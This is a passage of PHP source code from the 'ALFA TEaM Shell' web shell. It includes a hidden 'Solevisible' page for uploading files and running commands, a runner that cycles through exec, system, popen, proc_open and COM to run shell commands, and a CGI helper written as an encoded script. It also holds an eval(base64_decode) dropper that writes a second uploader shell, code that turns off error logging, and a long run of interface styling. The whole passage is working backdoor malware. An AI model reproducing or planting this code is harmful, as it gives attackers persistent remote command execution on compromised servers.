  656.             $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
  657.             if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
  658.             alfaWriteTocgiapi($lang.".alfa",$source);
  659.             alfacgihtaccess('cgi', "alfacgiapi/");
  660.         }else{
  661.             $lang = $_SESSION["alfacgiapi"];
  662.         }
  663.         $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
  664.         if($is_curl){
  665.             $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
  666.             $post = new AlfaCURL();
  667.             $data = $post->Send($address, "post", $cmd);
  668.         }elseif($is_socket){
  669.             $server = $_SERVER["SERVER_NAME"];
  670.             $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
  671.             $data = _alfa_fsockopen($server,$uri,$cmd);
  672.         }
  673.         $out = "";
  674.         if(strstr($data, "[solevisible~api]")){
  675.             $_SESSION["alfacgiapi"] = $lang;
  676.             if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
  677.                 $out = $res[1];
  678.             }
  679.         }elseif($lang=="perl"){
  680.             return _alfa_cgicmd($cmd_pure,"py");
  681.         }elseif($lang=="py"){
  682.             return _alfa_cgicmd($cmd_pure,"bash");
  683.         }else{
  684.             $_SESSION["alfacgiapi_mode"] = "off";
  685.         }
  686.         return trim($out);
  687.     }else{
  688.         return "";
  689.     }
  690. }
  691. function alfaEx($in,$re=false,$cgi=true,$all=false){
  692.     $data = _alfa_php_cmd($in,$re);
  693.     if(empty($data)&&$cgi||$all){
  694.         if($GLOBALS['sys']=='unix'){
  695.             if(strlen(_alfa_php_cmd("whoami"))==0||$all){
  696.                 $cmd = _alfa_cgicmd($in);
  697.                 if(!empty($cmd)){
  698.                     return $cmd;
  699.                 }
  700.             }
  701.         }
  702.     }
  703.     return $data;
  704. }
  705. function _alfa_php_cmd($in,$re=false){
  706. $out='';
  707. try{
  708. if($re)$in=$in." 2>&1";
  709. if(function_exists('exec')){
  710. @exec($in,$out);
  711. $out = @join("\n",$out);
  712. }elseif(function_exists('passthru')) {
  713. ob_start();
  714. @passthru($in);
  715. $out = ob_get_clean();
  716. }elseif(function_exists('system')){
  717. ob_start();
  718. @system($in);
  719. $out = ob_get_clean();
  720. } elseif (function_exists('shell_exec')) {
  721. $out = shell_exec($in);
  722. }elseif(function_exists("popen")&&function_exists("pclose")){
  723. if(is_resource($f = @popen($in,"r"))){
  724. $out = "";
  725. while(!@feof($f))
  726. $out .= fread($f,1024);
  727. pclose($f);
  728. }
  729. }elseif(function_exists('proc_open')){
  730. $pipes = array();
  731. $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
  732. $out=@stream_get_contents($pipes[1]);
  733. }elseif(class_exists('COM')){
  734. $alfaWs = new COM('WScript.shell');
  735. $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
  736. $stdout = $exec->StdOut();
  737. $out=$stdout->ReadAll();
  738. }
  739. }catch(Exception $e){}
  740. return $out;
  741. }
  742. function _alfa_fsockopen($server,$uri,$post){
  743.     $socket = @fsockopen($server, 80, $errno, $errstr, 15);
  744.     if($socket){
  745.         $http  = "POST {$uri} HTTP/1.0\r\n";
  746.         $http .= "Host: {$server}\r\n";
  747.         $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
  748.         $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
  749.         $http .= "Content-length: " . strlen($post) . "\r\n";
  750.         $http .= "Connection: close\r\n\r\n";
  751.         $http .= $post . "\r\n\r\n";
  752.         fwrite($socket, $http);
  753.         $contents = "";
  754.         while (!@feof($socket)) {
  755.             $contents .= @fgets($socket, 4096);
  756.         }
  757.         list($header, $body) = explode("\r\n\r\n", $contents, 2);
  758.         @fclose($socket);
  759.         return $body;
  760.     }else{
  761.         return "";
  762.     }
  763. }
  764. if(isset($_GET["solevisible"])){
  765. @error_reporting(E_ALL ^ E_NOTICE);
  766. echo '<html>';
  767. echo "<title>Solevisible Hidden Shell</title>";
  768. echo "<body bgcolor=#000000>";
  769. echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
  770. $safe_mode = @ini_get('safe_mode');
  771. if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
  772. echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
  773. echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
  774. echo "PHP Version: <font color=white>" . PHP_VERSION .  "</font><br />";
  775. echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@getcwd()) . "/<br />";
  776. echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
  777. echo"<font color=#7CFC00>Disable functions : </font>";
  778. $disfun = @ini_get('disable_functions');
  779. if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
  780. echo"<font color=red>";
  781. echo "$disfun";
  782. echo"</font><br>";
  783. echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
  784. echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
  785. echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  786. echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
  787. if(isset($_FILES['file'])){
  788. if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
  789. else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
  790. }
  791. echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
  792. <hr><pre>';
  793. if(isset($_POST['command_solevisible'])){
  794. if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
  795. $solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
  796. echo alfaEx($solevisible);
  797. }
  798. echo'</pre>
  799. </body></html>';
  800. exit;}
  801. @error_reporting(E_ALL ^ E_NOTICE);
  802. @ini_set('error_log',NULL);
  803. @ini_set('log_errors',0);
  804. @ini_set('max_execution_time',0);
  805. @ini_set('magic_quotes_runtime', 0);
  806. @set_time_limit(0);
  807. if(function_exists('set_magic_quotes_runtime')){
  808. @set_magic_quotes_runtime(0);
  809. }
  810. foreach($_POST as $key => $value){
  811. if(is_array($_POST[$key])){
  812. $i=0;
  813. foreach($_POST[$key] as $f) {
  814. $f = trim(str_replace(' ', '+',$f));
  815. $_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());
  816. $i++;
  817. }
  818. }else{
  819. $value = trim(str_replace(' ', '+',$value));
  820. $_POST[$key] = decrypt_post($value, _AlfaSecretKey());
  821. }
  822. }
  823. $default_action = 'FilesMan';
  824. $default_use_ajax = true;
  825. $default_charset = 'Windows-1251';
  826. if(strtolower(substr(PHP_OS,0,3))=="win")
  827. $GLOBALS['sys']='win';
  828. else
  829. $GLOBALS['sys']='unix';
  830. $GLOBALS['home_cwd'] = @getcwd();
  831. if($_POST["a"] != "GetPathHistory"){
  832.     if($_SESSION[__LAST_CWD__]!=$_POST['c']){
  833.         $_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];
  834.     }
  835. }
  836. $GLOBALS["need_to_update_header"] = "false";
  837. if(isset($_POST['c'])){
  838. if(!@chdir($_POST['c'])){
  839.     $GLOBALS['glob_chdir_false'] = true;
  840. }
  841. }
  842. $GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());
  843. if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}
  844. if($GLOBALS['sys'] == 'win'){
  845. $GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
  846. $GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
  847. $_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);
  848. }
  849. if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
  850. function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}
  851. function alfahead(){
  852. if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
  853. $GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
  854. $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
  855. define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
  856. define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
  857. if(!isset($_POST['ajax'])){
  858. function Alfa_GetDisable_Function(){
  859. $disfun = @ini_get('disable_functions');
  860. $afa = '<span class="header_show_all">All Functions Accessible</span>';
  861. if(empty($disfun))return($afa);
  862. $s = explode(',',$disfun);
  863. $s = array_unique($s);
  864. $i=0;
  865. $b=0;
  866. $func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
  867. $black_list = array();
  868. $allow_list = array();
  869. foreach($s as $d){
  870.     $d=trim($d);
  871.     if(empty($d)||!is_callable($d))continue;
  872.     if(!function_exists($d)){
  873.         if(in_array($d,$func)){
  874.             $dis .= $d." | ";$b++;
  875.             $black_list[] = $d;
  876.         }else{
  877.             $allow_list[] = $d;
  878.         }
  879.         $i++;
  880.     }
  881. }
  882. if($i==0)return($afa);
  883. if($i <= count($func)){
  884. $all = array_values(array_merge($black_list, $allow_list));
  885. return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
  886. }
  887. return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
  888. }
  889. function AlfaNum(){
  890. $args = func_get_args();
  891. $alfax = array();
  892. $find = array();
  893. for($i=1;$i<=10;$i++){
  894. $alfax[] = $i;
  895. }
  896. foreach($args as $arg){
  897. $find[] = $arg;
  898. }
  899. echo '<script>';
  900. foreach($alfax as $alfa){
  901. if(in_array($alfa,$find))
  902. continue;
  903. echo 'alfa'.$alfa."_=";
  904. }
  905. echo '""</script>';
  906. }
  907. if(empty($_POST['charset']))
  908. $_POST['charset'] = $GLOBALS['default_charset'];
  909. $freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
  910. $totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
  911. $totalSpace = $totalSpace?$totalSpace:1;
  912. $on="<span class='header_on'> ON </span>";
  913. $of="<span class='header_off'> OFF </span>";
  914. $none="<span class='header_none'> NONE </span>";
  915. if(function_exists('ssh2_connect'))
  916. $ssh2=$on;
  917. else
  918. $ssh2=$of;
  919. if(function_exists('curl_version'))
  920. $curl=$on;
  921. else
  922. $curl=$of;
  923. if(function_exists('mysql_get_client_info'))
  924. $mysql=$on;
  925. else
  926. $mysql=$of;
  927. if(function_exists('mssql_connect'))
  928. $mssql=$on;
  929. else
  930. $mssql=$of;
  931. if(function_exists('pg_connect'))
  932. $pg=$on;
  933. else
  934. $pg=$of;
  935. if(function_exists('oci_connect'))
  936. $or=$on;
  937. else
  938. $or=$of;
  939. if(@ini_get('disable_functions'))
  940. $disfun=@ini_get('disable_functions');
  941. else
  942. $disfun="All Functions Enable";
  943. if(@ini_get('safe_mode'))
  944. $safe_modes="<span class='header_off'>ON</span>";
  945. else
  946. $safe_modes="<span class='header_on'>OFF</span>";
  947. $cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
  948. if(@ini_get('open_basedir')){
  949. $basedir_data = @ini_get('open_basedir');
  950. if(strlen($basedir_data)>120){
  951. $open_b=substr($basedir_data,0, 120)."...";
  952. }else{
  953. $open_b = $basedir_data;
  954. }
  955. }else{$open_b=$none;}
  956. if(@ini_get('safe_mode_exec_dir'))
  957. $safe_exe=@ini_get('safe_mode_exec_dir');
  958. else
  959. $safe_exe=$none;
  960. if(@ini_get('safe_mode_include_dir'))
  961. $safe_include=@ini_get('safe_mode_include_dir');
  962. else
  963. $safe_include=$none;
  964. if(!function_exists('posix_getegid'))
  965. {
  966. $user = function_exists("get_current_user")?@get_current_user():"????";
  967. $uid = function_exists("getmyuid")?@getmyuid():"????";
  968. $gid = function_exists("getmygid")?@getmygid():"????";
  969. $group = "?";
  970. }else{
  971. $uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
  972. $gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
  973. $user = $uid['name'];
  974. $uid = $uid['uid'];
  975. $group = $gid['name'];
  976. $gid = $gid['gid'];
  977. }
  978. $cwd_links = '';
  979. $path = explode("/", $GLOBALS['cwd']);
  980. $n=count($path);
  981. for($i=0; $i<$n-1; $i++) {
  982. $cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";
  983. for($j=0; $j<=$i; $j++)
  984. $cwd_links .= $path[$j].'/';
  985. $cwd_links .= "\")'>".$path[$i]."/</a>";
  986. }
  987. $drives = "";
  988. foreach(range('a','z') as $drive)
  989. if(@is_dir($drive.':\\'))
  990. $drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
  991. $csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
  992. echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  993. <html xmlns="http://www.w3.org/1999/xhtml">
  994. <head>
  995. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  996. <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
  997. <link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
  998. <title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>
  999. <link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">
  1000. <style type="text/css">
  1001. .hlabale {
  1002.     color: #67ABDF;
  1003.     border-radius: 4px;
  1004.     border: 1px solid #27979B;
  1005.     margin-left: 7px;
  1006.     padding: 2px;
  1007. }
  1008. #tbl_sympphp tr {
  1009.     text-align: center;
  1010. }
  1011. .editor-view {
  1012.     position: relative;
  1013. }
  1014. .view-content {
  1015.     position: absolute;
  1016.     overflow-y: auto;
  1017.     width: 100%;
  1018.     height: 475px;
  1019. }
  1020. *::-webkit-scrollbar-track {
  1021.     -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);
  1022.     border-radius: 10px;
  1023.     background-color: #000115;
  1024. }
  1025. *::-webkit-scrollbar{
  1026.     width: 10px;
  1027.     background-color: #000115;
  1028. }
  1029. *::-webkit-scrollbar-thumb {
  1030.     border-radius: 10px;
  1031.     -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);
  1032.     background-color: rgb(30, 130, 181);
  1033. }
  1034. .editor-file-name {
  1035.     margin-left: 29px;
  1036.     margin-top: 4px;
  1037.     overflow: hidden;
  1038.     text-overflow: ellipsis;
  1039.     white-space: nowrap;
  1040. }
  1041. .editor-icon {
  1042.     position: absolute;
  1043. }
  1044. .is_active {
  1045.     background: rgba(49, 55, 93, 0.77);
  1046.     border-radius: 10px;
  1047. }
  1048. .history-list {
  1049.     height: 88%;
  1050.     overflow-y: auto;
  1051. }
  1052. #editor-minimized,#cgiloader-minimized {
  1053.     display: block;
  1054.     position: fixed;
  1055.     right: -30px;
  1056.     width: 30px;
  1057.     height: 30px;
  1058.     top: 30%;
  1059. }
  1060. .minimized-wrapper {
  1061.     position: relative;
  1062.     background: rgb(14, 48, 74);
  1063.     width: 44px;
  1064.     height: 167px;
  1065.     cursor: pointer;
  1066.     border-bottom-left-radius: 5px;
  1067.     border-top-left-radius: 5px;
  1068. }
  1069. .minimized-text {
  1070.     transform: rotate(-90deg);
  1071.     color: wheat;
  1072.     font-size: x-large;
  1073.     display: inline-block;
  1074.     position: absolute;
  1075.     right: -51px;
  1076.     width: 129px;
  1077.     top: 50px;
  1078.     border-top-left-radius: 4%;
  1079.     height: 56px;
  1080.     padding: 3px
  1081. }
  1082. .close-button,.editor-minimize {
  1083.     height: 26px;
  1084.     width: 38px;
  1085.     right: 7px;
  1086.     background: rgb(29, 86, 115);
  1087.     cursor: pointer;
  1088.     position: absolute;
  1089.     box-sizing: border-box;
  1090.     line-height: 50px;
  1091.     display: inline-block;
  1092.     top: 17px;
  1093.     border-radius: 100px;
  1094. }
  1095. .editor-minimize {right: 50px;}
  1096. .close-button:before,.close-button:after,.editor-minimize:before {
  1097.     transform: rotate(-45deg);
  1098.     content: "";
  1099.     position: absolute;
  1100.     top: 63%;
  1101.     right: 6px;
  1102.     margin-top: -5px;
  1103.     margin-left: -25px;
  1104.     display: block;
  1105.     height: 4px;
  1106.     width: 27px;
  1107.     background-color: rgba(216, 207, 207, 0.75);
  1108.     transition: all 0.25s ease-out;
  1109. }
  1110. .editor-minimize:before{
  1111.     transform: rotate(0deg);
  1112. }
  1113. .close-button:after {
  1114.   transform: rotate(-135deg);
  1115. }
  1116. .close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{
  1117.     background-color: red;
  1118. }
  1119. .close-button:hover,.editor-minimize:hover{
  1120.     background-color: rgba(39, 66, 80, 0.96);
  1121. }
  1122. #editor,#cgiloader {
  1123.     display: none;
  1124.     position: fixed;
  1125.     top: 0;
  1126.     width: 100%;
  1127.     height: 100%;
  1128. }
  1129. .editor-wrapper {
  1130.     width: 100%;
  1131.     height: 100%;
  1132.     position: relative;
  1133.     top: 1%;
  1134. }
  1135. .editor-header {
  1136.     width: 97%;
  1137.     background: rgba(21, 66, 88, 0.93);
  1138.     height: 37px;
  1139.     margin-left: 13px;
  1140.     position: relative;
  1141.     border-top-left-radius: 15px;
  1142.     border-top-right-radius: 15px;
  1143. }
  1144. .editor-path {
  1145.     position: absolute;
  1146.     font-size: x-large;
  1147.     margin-left: 10px;
  1148.     top: 6px;
  1149.     color: springgreen;
  1150. }
  1151. .editor-modal {
  1152.     position: relative;
  1153.     top: 0;
  1154.     background-color: rgba(0, 1, 23, 0.95);
  1155.     height: 90%;
  1156.     margin-left: 20%;
  1157.     margin-right: 2%;
  1158.     border: 2px #0e304a solid;
  1159. }
  1160. .editor-explorer {
  1161.     width: 19%;
  1162.     height: 90%;
  1163.     background-color: rgba(0, 1, 23, 0.94);
  1164.     position: absolute;
  1165.     z-index: 2;
  1166.     left: 1%;
  1167.     border: 2px rgb(14, 48, 74) solid;
  1168. }
  1169. .editor-controller {
  1170.     position: relative;
  1171.     top: -13px;
  1172. }
  1173. .file-holder {
  1174.     position: relative;
  1175.     width: 100%;
  1176.     height: 30px;
  1177. }
  1178. .file-holder > .history {
  1179.     position: absolute;
  1180.     color: rgb(3, 179, 163);
  1181.     cursor: pointer;
  1182.     left:5px;
  1183.     font-size: 18px;
  1184.     font-family: sans-serif;
  1185.     width:89%;
  1186.     height:100%;
  1187.     z-index: 3;
  1188.     border-radius: 10px;
  1189.     transition: background-color 600ms ease-out;
  1190. }
  1191. .file-holder > .history-close {
  1192.     display: block;
  1193.     opacity: 0;
  1194.     position: absolute;
  1195.     right: 2px;
  1196.     width: 20px;
  1197.     top: 4px;
  1198.     text-align: center;
  1199.     cursor: pointer;
  1200.     color: white;
  1201.     background: red;
  1202.     border-radius: 100px;
  1203.     font-family: monospace;
  1204.     z-index: 10;
  1205.     transition: opacity 600ms ease-out;
  1206.     font-size: 15px;
  1207.     height: 19px;
  1208. }
  1209. .file-holder > .history:hover {
  1210.     background-color: #646464;
  1211. }
  1212. .editor-explorer > .hheader {
  1213.     position: relative;
  1214.     color: rgb(20, 255, 7);
  1215.     border-bottom: 2px rgb(32, 106, 162) solid;
  1216.     text-align: center;
  1217.     font-family: sans-serif;
  1218.     margin-bottom: 10px;
  1219.     height: 55px;
  1220. }
  1221. .editor-search {
  1222.     position: absolute;
  1223.     bottom: 7px;
  1224.     left: 31px;
  1225. }
  1226. .hheader-text {
  1227.     position: absolute;
  1228.     left: 8px;
  1229.     top: 2px;
  1230. }
  1231. .history-clear {
  1232.     position: absolute;
  1233.     right: 8px;
  1234.     top: 2px;
  1235.     cursor: pointer;
  1236. }
  1237. .editor-body {
  1238.     position: relative;
  1239.     margin-left: 3px;
  1240. }
  1241. .editor-anim-close {
  1242.     '.showAnimation("editorClose").'
  1243. }
  1244. @keyframes editorClose {
  1245.     0% {
  1246.         transform: scale(1);
  1247.         opacity: 1;
  1248.     }
  1249.     100% {
  1250.         transform: scale(0);
  1251.         opacity: 0;
  1252.     }
  1253. }
  1254. .editor-anim-minimize {
  1255.     '.showAnimation("editorMinimize").'
  1256. }
  1257. @keyframes editorMinimize {
  1258.     0% {
  1259.         right:0px;
  1260.         opacity: 1;
  1261.     }
  1262.     100% {
  1263.         right: -2000px;
  1264.         opacity: 0;
  1265.     }
  1266. }
  1267. .editor-anim-show {
  1268.     '.showAnimation("editorShow").'
  1269. }
  1270. @keyframes editorShow {
  1271.     0% {
  1272.         right:-2000px;
  1273.         opacity: 0;
  1274.     }
  1275.     100% {
  1276.         right: 0px;
  1277.         opacity: 1;
  1278.     }
  1279. }
  1280. .minimized-show {
  1281.     '.showAnimation("minimizeShow").'
  1282. }
  1283. @keyframes minimizeShow {
  1284.     0% {
  1285.         right: -30px;
  1286.         opacity: 0;
  1287.     }
  1288.     100% {
  1289.         right: 0px;
  1290.         opacity: 1;
  1291.     }
  1292. }
  1293. .minimized-hide {
  1294.     '.showAnimation("minimizeHide").'
  1295. }
  1296. @keyframes minimizeHide {
  1297.     0% {
  1298.         right: 0px;
  1299.         opacity: 1;
  1300.     }
  1301.     100% {
  1302.         right: -30px;
  1303.         opacity: 0;
  1304.     }
  1305. }
  1306. .solevisible-text:hover {
  1307.     -webkit-text-shadow: 0px 0px 25px #00FF00;
  1308.     -moz-text-shadow: 0px 0px 25px #00FF00;
  1309.     -ms-text-shadow: 0px 0px 25px #00FF00;
  1310.     text-shadow: 0px 0px 25px #00FF00;
  1311. }
  1312. .update-holder {
  1313.     position: fixed;
  1314.     top: 0;
  1315.     background-color: rgba(0, 24, 29, 0.72);
  1316.     width: 100%;
  1317.     height: 100%;
  1318. }
  1319. .update-partner {
  1320.     width: 50%;
  1321.     position: relative;
  1322.     border-radius: 31px;
  1323.     height: 200px;
  1324.     background-color: rgba(3, 3, 41, 0.47);
  1325.     text-align: center;
  1326.     color: rgba(252, 253, 251, 0.88);
  1327.     margin-left: 25%;
  1328.     top: 23%;
  1329.     font-family: "Francois One", sans-serif;
  1330. }
  1331. .update-partner:hover {
  1332. -webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
  1333. -moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);
